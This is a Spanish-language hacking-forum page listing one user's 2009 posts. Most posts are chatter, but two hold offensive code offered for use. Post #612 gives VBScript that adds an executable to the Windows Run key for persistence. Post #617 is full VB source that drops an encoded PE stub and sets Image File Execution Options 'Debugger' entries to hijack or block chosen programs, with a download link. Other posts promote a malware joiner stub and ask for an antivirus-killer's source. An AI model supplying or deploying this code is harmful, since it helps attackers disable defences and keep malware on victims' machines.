Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Mad Antrax

#611
Sirve igual si haces un #Put en el primer byte, que por norma es la letra "M" y listos. Todo fichero PE empieza con los carácteres "MZ" al inicio. Pero de igual forma buena tool

:)
#612

CLAVE="System"
VALOR="C:\tu_ubicacion\archivo.exe"
set wsc = createobject("wscript.shell")
wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & CLAVE, VALOR


Saludos.
#613
Cita de: kåhjî£ en  2 Abril 2009, 23:01 PM
pd: por favor cambia en el tema la primera palabra HACIA por HACE

Bajo tu petición, te edité el titulo, ok?
#614
Cita de: BadDevil en  2 Abril 2009, 16:17 PM
Pero tu estas muy desaparecido ultimamente  :xD
Sí, pero ya estoy de vuelta, mala hierba nunca muere...

Cita de: Carloswaldo en  2 Abril 2009, 17:07 PM
Y por qué crees que "no es mucho". xDD
Pues porque 800€ al mes por ser del staff es poca cosa.

Cita de: Novlucker en  2 Abril 2009, 17:38 PM
Y le acaban de subir el sueldo  :silbar:

Citar||MadAntrax||
Lab Member
Moderador Global
Siiiiiii, ;)
#615
Yo si tengo un sueldo por ser colaborador. No es mucho pero bueno...
#616
Que coño, a veces nos complicamos por placer o que?...


net view \\192.168.0.50


Siendo 192.168.0.50 la máquina remota. Es un comando de Windows que nos devuelve los recursos que comparte y su tipo (impresoras o carpetas). Usa pipes para redireccionar la salida del comando net view y ya lo tienes todo hecho.

Saludos.

Cita de: Hole_System en 20 Enero 2009, 00:01 AM
Con el Net View se que se puede hacer pero quisiera saber como hacerlo con APIS!!

Perdona, no te había leído. Eso pasa por responder sin leer los demás mensajes xD
#617
Aquí dejo el source completo del programa iFEO.exe del que he hablado en este post original:

[Método] - iFEO bug (Image File Execution Options)

Aquí esta el source del programa, el módulo principal:

Código (vb) [Seleccionar]
Function DropDummy(ByVal ThePath As String) As Boolean
    On Error Resume Next

    File = ""
    File = File & "4D5A0000504500004C0101006A2A58C3z8z040003010B01080001"
    File = File & "000080z4z79z3z0Cz3z79z3z0Cz5z400004z3z04z3z74z3z20z3z"
    File = File & "04z7z0401000088z7z02z19z4B45524E454C33322E646C6Cz4z38"

    i = 1
    Tmp = ""
    While i <= Len(File)
        If Mid(File, i, 1) = "z" Then
            a = i + 1
            k = 0
            While Mid(File, a, 1) <> "z"
                k = k * 10 + Mid(File, a, 1)
                a = a + 1
            Wend
            i = a + 1
            For a = 1 To k
                Tmp = Tmp + "00"
            Next
        ElseIf Mid(File, i, 1) <> "z" Then
            Tmp = Tmp & Mid(File, i, 2)
            i = i + 2
        End If
    Wend

    Set hFSO = CreateObject("Scripting.FileSystemObject")
    Set hFile = hFSO.CreateTextFile(ThePath, ForWriting)
    i = 1
    While i < Len(Tmp)
        File = Int("&H" & Mid(Tmp, i, 2))
        hFile.Write (Chr(File))
        i = i + 2
    Wend
    hFile.Close
    DoEvents
    DropDummy = True
End Function

Function AddFileName(ByVal fName As String, ByVal DummyFile As String)
    On Error Resume Next
    Set WShell = CreateObject("WScript.Shell")
    WShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" & fName & "\Debugger", Chr(34) & UCase(DummyFile) & Chr(34)
End Function

Function DelFileName(ByVal fName As String)
    On Error Resume Next
    Set WShell = CreateObject("WScript.Shell")
    WShell.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" & fName & "\Debugger"
End Function


Y su descarga completa:

http://cactus-software.elhacker.net/iFEO Bug.zip

Saludos!!
#618
Cita de: XcryptOR en 23 Marzo 2009, 15:26 PM
Si lo liberare en un par de dias, depuro un poco mas el code, los estructuro y listo para ver la luz.

saludos  :D

Perfecto entonces. Lo incluiré en el nuevo stub para el Cactus Joiner 3.0 que liberaré en breve. Te pondré como autor original del source y saldrás en el about del programa. Si tienes pagina web o mail lo puedo incluir también a modo de publicidad.

Saludos. Ya me avisarás.
#619
Cita de: XcryptOR en 23 Marzo 2009, 14:51 PM
Muchas Gracias MadAntrax, mi problema esta solucionado, no conocia el comando netsh, mil y mil gracias

De nada, para eso estamos, para ayudar. Ahora si no es mucho pedir... publicarás el source de tu Kaspersky-AVKiller?

Saludos.
#620
Cita de: Spider-Net en 23 Marzo 2009, 11:06 AM
OMG! MadAntrax como tú por aquí  :o :o :o

Perdón por desvirtuar el tema pero hacia bastante que no te veía xDA
Cuando he visto tu nick en este topic lo primero que pensé fue: otra vez han vuelto a resucitar uno de los temas de madantrax xddd

Mala hierba nunca muere...

No desviemos el tema del post. Saludos! :)